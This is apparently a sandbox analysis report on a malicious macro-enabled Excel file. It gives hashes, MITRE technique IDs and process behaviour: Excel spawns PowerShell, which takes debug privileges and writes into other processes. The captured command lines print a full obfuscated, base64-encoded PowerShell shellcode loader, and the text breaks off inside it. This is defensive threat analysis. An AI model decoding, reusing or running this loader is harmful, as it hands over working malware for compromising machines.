df4710eafb4aefe31ca783ee7ecd666726872ab820983a855498d8d6ba94967d

General

Target

df4710eafb4aefe31ca783ee7ecd666726872ab820983a855498d8d6ba94967d.xlsm
Size

20KB
MD5

3aa5372c22d6d5282a1484cf12a37e6a
SHA1

b20c87c0ee0409b651ff9751204969b0fc61996d
SHA256

df4710eafb4aefe31ca783ee7ecd666726872ab820983a855498d8d6ba94967d
SHA512

0c6e6cc2a7160c53ef2289bde938001e277e27d1cfe17621d42b00ad83ac3b6c37f1b1c5a6107d1e90c0577a46074f0789a26e39e0d10ca586b62de8704249d6

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3992	664	powershell.exe	EXCEL.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

664 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
3992	powershell.exe
3992	powershell.exe
3992	powershell.exe
3980	powershell.exe
3980	powershell.exe
3980	powershell.exe
2020	powershell.exe
2020	powershell.exe
2020	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3992 powershell.exe
Token: SeDebugPrivilege 3980 powershell.exe
Token: SeDebugPrivilege 2020 powershell.exe

description	pid	process
Token: SeDebugPrivilege	3992	powershell.exe
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	2020	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	process
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

EXCEL.EXEpowershell.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 664 wrote to memory of 3992	664	EXCEL.EXE	powershell.exe
PID 664 wrote to memory of 3992	664	EXCEL.EXE	powershell.exe
PID 3992 wrote to memory of 3980	3992	powershell.exe	powershell.exe
PID 3992 wrote to memory of 3980	3992	powershell.exe	powershell.exe
PID 3980 wrote to memory of 2020	3980	powershell.exe	powershell.exe
PID 3980 wrote to memory of 2020	3980	powershell.exe	powershell.exe
PID 3980 wrote to memory of 2020	3980	powershell.exe	powershell.exe
PID 2020 wrote to memory of 4416	2020	powershell.exe	csc.exe
PID 2020 wrote to memory of 4416	2020	powershell.exe	csc.exe
PID 2020 wrote to memory of 4416	2020	powershell.exe	csc.exe
PID 4416 wrote to memory of 4456	4416	csc.exe	cvtres.exe
PID 4416 wrote to memory of 4456	4416	csc.exe	cvtres.exe
PID 4416 wrote to memory of 4456	4416	csc.exe	cvtres.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\df4710eafb4aefe31ca783ee7ecd666726872ab820983a855498d8d6ba94967d.xlsm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /w 1 /C "sv Tzg -;sv Ftl ec;sv bW ((gv Tzg).value.toString()+(gv Ftl).value.toString());powershell (gv bW).value.toString() ('JABHAGIAPQAnACQAZwByAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkACIAKwAiAGwAIgArACIAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlACIAKwAiAHIAIgArACIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQAiACsAIgByACIAKwAiAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABvAFAAWgApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkACIAKwAiAGwAIgArACIAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQARwBsAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADMAMQAsAH0AZAAyACwAfQA2ADQALAB9ADgAYgAsAH0ANQAyACwAfQAzADAALAB9ADgAOQAsAH0AZQA1ACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQAzADEALAB9AGYAZgAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA1ADAALAB9ADgAYgAsAH0ANQA4ACwAfQAyADAALAB9ADgAYgAsAH0ANAA4ACwAfQAxADgALAB9ADAAMQAsAH0AZAAzACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AOABiACwAfQAzADQALAB9ADgAYgAsAH0AMwAxACwAfQBmAGYALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADYAZQAsAH0ANgA1ACwAfQA3ADQALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADYAOQAsAH0ANgBlACwAfQA2ADkALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9AGYAZgAsAH0AZAA1ACwAfQAzADEALAB9AGQAYgAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADYAOAAsAH0AMwBhACwAfQA1ADYALAB9ADcAOQAsAH0AYQA3ACwAfQBmAGYALAB9AGQANQAsAH0ANQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAzACwAfQA1ADMALAB9ADUAMwAsAH0ANgA4ACwAfQBiAGIALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9AGUAOAAsAH0AYgAwACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQAyAGYALAB9ADMAMQAsAH0ANwAyACwAfQAzADAALAB9ADUAMAAsAH0ANgBlACwAfQA3ADAALAB9ADYAZAAsAH0ANwAwACwAfQA0AGMALAB9ADcANQAsAH0AMwA5ACwAfQA3ADcALAB9ADUAOAAsAH0ANgBlACwAfQA0ADYALAB9ADYANgAsAH0ANAA1ACwAfQA1ADUALAB9ADcAOAAsAH0ANQA1ACwAfQA0AGQALAB9ADUAMQAsAH0ANQBhACwAfQA2ADgALAB9ADYAMQAsAH0ANABhACwAfQA0ADYALAB9ADcAMwAsAH0ANwAwACwAfQAwADAALAB9ADUAMAAsAH0ANgA4ACwAfQA1ADcALAB9ADgAOQAsAH0AOQBmACwAfQBjADYALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADkALAB9AGMANgAsAH0ANQAzACwAfQA2ADgALAB9ADAAMAAsAH0AMwAyACwAfQBlADgALAB9ADgANAAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQA3ACwAfQA1ADMALAB9ADUANgAsAH0ANgA4ACwAfQBlAGIALAB9ADUANQAsAH0AMgBlACwAfQAzAGIALAB9AGYAZgAsAH0AZAA1ACwAfQA5ADYALAB9ADYAYQAsAH0AMABhACwAfQA1AGYALAB9ADYAOAAsAH0AOAAwACwAfQAzADMALAB9ADAAMAAsAH0AMAAwACwAfQA4ADkALAB9AGUAMAAsAH0ANgBhACwAfQAwADQALAB9ADUAMAAsAH0ANgBhACwAfQAxAGYALAB9ADUANgAsAH0ANgA4ACwAfQA3ADUALAB9ADQANgAsAH0AOQBlACwAfQA4ADYALAB9AGYAZgAsAH0AZAA1ACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUANgAsAH0ANgA'+'4ACwAfQAyAGQALAB9ADAANgAsAH0AMQA4ACwAfQA3AGIALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA1ACwAfQAxADYALAB9ADYAOAAsAH0AOAA4ACwAfQAxADMALAB9ADAAMAAsAH0AMAAwACwAfQA2ADgALAB9ADQANAAsAH0AZgAwACwAfQAzADUALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADQAZgAsAH0ANwA1ACwAfQBjAGQALAB9ADYAOAAsAH0AZgAwACwAfQBiADUALAB9AGEAMgAsAH0ANQA2ACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQA0ADAALAB9ADYAOAAsAH0AMAAwACwAfQAxADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADgALAB9ADAAMAAsAH0AMAAwACwAfQA0ADAALAB9ADAAMAAsAH0ANQAzACwAfQA2ADgALAB9ADUAOAAsAH0AYQA0ACwAfQA1ADMALAB9AGUANQAsAH0AZgBmACwAfQBkADUALAB9ADkAMwAsAH0ANQAzACwAfQA1ADMALAB9ADgAOQAsAH0AZQA3ACwAfQA1ADcALAB9ADYAOAAsAH0AMAAwACwAfQAyADAALAB9ADAAMAAsAH0AMAAwACwAfQA1ADMALAB9ADUANgAsAH0ANgA4ACwAfQAxADIALAB9ADkANgAsAH0AOAA5ACwAfQBlADIALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQBjAGQALAB9ADgAYgAsAH0AMAA3ACwAfQAwADEALAB9AGMAMwAsAH0AOAA1ACwAfQBjADAALAB9ADcANQAsAH0AZQA1ACwAfQA1ADgALAB9AGMAMwAsAH0ANQBmACwAfQBlADgALAB9ADYAOQAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0AMwAxACwAfQAzADAALAB9ADIAZQAsAH0AMwA4ACwAfQAzADAALAB9ADIAZQAsAH0AMwAyACwAfQAyAGUALAB9ADMAMgAsAH0AMwAxACwAfQAzADkALAB9ADAAMAAiADsAJABBAG4APQBBAGQAZAAtAFQAeQBwAGUAIAAtAHAAYQBzAHMAIAAtAG0AIAAkAGcAcgAgAC0ATgBhAG0AZQAgACIAUgBxACIAIAAtAG4AYQBtAGUAcwAgAG0AVQBQADsAJABBAG4APQAkAEEAbgAuAHIAZQBwAGwAYQBjAGUAKAAiAG0AVQBQACIALAAgACIAVwBpAG4AIgArACIAMwAiACsAIgAyAEYAdQBuAGMAdABpAG8AbgBzACIAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAEcAbAAgAD0AIAAkAEcAbAAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACIARQBuAEgAeAAiACkALgByAGUAcABsAGEAYwBlACgAIgBFAG4ASAAiACwAIAAiADAAIgApAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACQASwBiAD0AMAB4ADEAMAAwADMAOwBpAGYAIAAoACQARwBsAC4ATAAgAC0AZwB0ACAAMAB4ADEAMAAwADMAKQB7ACQASwBiAD0AJABHAGwALgBMAH0AOwAkAHUAbwA9ACQAQQBuADoAOgBjAGEAbABsAG8AYwAoADAAeAAxADAAMAAzACwAIAAxACkAOwBbAFUASQBuAHQANgA0AF0AJABvAFAAWgAgAD0AIAAwADsAZgBvAHIAKAAkAGEAdwA9ADAAOwAkAGEAdwAgAC0AbABlACgAJABHAGwALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAYQB3ACsAKwApAHsAJABBAG4AOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB1AG8ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAYQB3ACkALAAgACQARwBsAFsAJABhAHcAXQAsACAAMQApAH0AOwAkAEEAbgA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJAB1AG8ALAAgADAAeAAxADAAMAAzACwAIAAwAHgANAAwACwAIABbAFIAZQBmAF0AJABvAFAAWgApADsAJABLAEIAUAA9AFsAaQBuAHQAXQAwAHgAMAAwADsAJABBAG4AOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAWwBpAG4AdABdADAALAAkAEsAQgBQACwAJAB1AG8ALAAwACwAMAAsADEALQAxACkAOwAnADsAJABOAFIAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEcAYgApACkAOwAkAFkAVAA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABEAG0APQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQAdQBIAEMAIAA9ACAAIgBDADoAXAAkAEQAbQBcAFgAYwBKAHAAUQBNAFwAJABEAG0AJABZAFQAXAB2ADEALgAwAFwAJABZAFQAIgA7ACQAdQBIAEMAIAA9ACAAJAB1AEgAQwAuAHIAZQBwAGwAYQBjAGUAKAAiAFgAYwBKACIALAAgACIAcwB5AHMAIgApADsAJAB1AEgAQwAgAD0AIAAkAHUASABDAC4AcgBlAHAAbABhAGMAZQAoACIAcABRAE0AIgAsACAAIgB3AG8AdwA2ADQAIgApADsAJABFAGUAQQByACAAPQAgACcAVAByACIAKwAiAHUAIgArACIAZQAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAEUAZQBBAHIAJwApAHsAJABZAFQAPQAgACQAdQBIAEMAfQA7ACQAZQB6AD0AIgAgACQAWQBUACAAZgBKAEgAIAAkAE4AUgAiADsAJABlAHoAPQAkAGUAegAuAHIAZQBwAGwAYQBjAGUAKAAiAGYASgBIACIALAAgACIALQBuAG8AZQB4AGkAdAAgAC0AZQAiACkAOwBpAGUAeAAgACQAZQB6AA'+'==')"
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABHAGIAPQAnACQAZwByAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkACIAKwAiAGwAIgArACIAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlACIAKwAiAHIAIgArACIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQAiACsAIgByACIAKwAiAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABvAFAAWgApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkACIAKwAiAGwAIgArACIAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQARwBsAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADMAMQAsAH0AZAAyACwAfQA2ADQALAB9ADgAYgAsAH0ANQAyACwAfQAzADAALAB9ADgAOQAsAH0AZQA1ACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQAzADEALAB9AGYAZgAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA1ADAALAB9ADgAYgAsAH0ANQA4ACwAfQAyADAALAB9ADgAYgAsAH0ANAA4ACwAfQAxADgALAB9ADAAMQAsAH0AZAAzACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AOABiACwAfQAzADQALAB9ADgAYgAsAH0AMwAxACwAfQBmAGYALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADYAZQAsAH0ANgA1ACwAfQA3ADQALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADYAOQAsAH0ANgBlACwAfQA2ADkALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9AGYAZgAsAH0AZAA1ACwAfQAzADEALAB9AGQAYgAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADYAOAAsAH0AMwBhACwAfQA1ADYALAB9ADcAOQAsAH0AYQA3ACwAfQBmAGYALAB9AGQANQAsAH0ANQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAzACwAfQA1ADMALAB9ADUAMwAsAH0ANgA4ACwAfQBiAGIALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9AGUAOAAsAH0AYgAwACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQAyAGYALAB9ADMAMQAsAH0ANwAyACwAfQAzADAALAB9ADUAMAAsAH0ANgBlACwAfQA3ADAALAB9ADYAZAAsAH0ANwAwACwAfQA0AGMALAB9ADcANQAsAH0AMwA5ACwAfQA3ADcALAB9ADUAOAAsAH0ANgBlACwAfQA0ADYALAB9ADYANgAsAH0ANAA1ACwAfQA1ADUALAB9ADcAOAAsAH0ANQA1ACwAfQA0AGQALAB9ADUAMQAsAH0ANQBhACwAfQA2ADgALAB9ADYAMQAsAH0ANABhACwAfQA0ADYALAB9ADcAMwAsAH0ANwAwACwAfQAwADAALAB9ADUAMAAsAH0ANgA4ACwAfQA1ADcALAB9ADgAOQAsAH0AOQBmACwAfQBjADYALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADkALAB9AGMANgAsAH0ANQAzACwAfQA2ADgALAB9ADAAMAAsAH0AMwAyACwAfQBlADgALAB9ADgANAAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQA3ACwAfQA1ADMALAB9ADUANgAsAH0ANgA4ACwAfQBlAGIALAB9ADUANQAsAH0AMgBlACwAfQAzAGIALAB9AGYAZgAsAH0AZAA1ACwAfQA5ADYALAB9ADYAYQAsAH0AMABhACwAfQA1AGYALAB9ADYAOAAsAH0AOAAwACwAfQAzADMALAB9ADAAMAAsAH0AMAAwACwAfQA4ADkALAB9AGUAMAAsAH0ANgBhACwAfQAwADQALAB9ADUAMAAsAH0ANgBhACwAfQAxAGYALAB9ADUANgAsAH0ANgA4ACwAfQA3ADUALAB9ADQANgAsAH0AOQBlACwAfQA4ADYALAB9AGYAZgAsAH0AZAA1ACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUANgAsAH0ANgA4ACwAfQAyAGQALAB9ADAANgAsAH0AMQA4ACwAfQA3AGIALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA1ACwAfQAxADYALAB9ADYAOAAsAH0AOAA4ACwAfQAxADMALAB9ADAAMAAsAH0AMAAwACwAfQA2ADgALAB9ADQANAAsAH0AZgAwACwAfQAzADUALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADQAZgAsAH0ANwA1ACwAfQBjAGQALAB9ADYAOAAsAH0AZgAwACwAfQBiADUALAB9AGEAMgAsAH0ANQA2ACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQA0ADAALAB9ADYAOAAsAH0AMAAwACwAfQAxADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADgALAB9ADAAMAAsAH0AMAAwACwAfQA0ADAALAB9ADAAMAAsAH0ANQAzACwAfQA2ADgALAB9ADUAOAAsAH0AYQA0ACwAfQA1ADMALAB9AGUANQAsAH0AZgBmACwAfQBkADUALAB9ADkAMwAsAH0ANQAzACwAfQA1ADMALAB9ADgAOQAsAH0AZQA3ACwAfQA1ADcALAB9ADYAOAAsAH0AMAAwACwAfQAyADAALAB9ADAAMAAsAH0AMAAwACwAfQA1ADMALAB9ADUANgAsAH0ANgA4ACwAfQAxADIALAB9ADkANgAsAH0AOAA5ACwAfQBlADIALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQBjAGQALAB9ADgAYgAsAH0AMAA3ACwAfQAwADEALAB9AGMAMwAsAH0AOAA1ACwAfQBjADAALAB9ADcANQAsAH0AZQA1ACwAfQA1ADgALAB9AGMAMwAsAH0ANQBmACwAfQBlADgALAB9ADY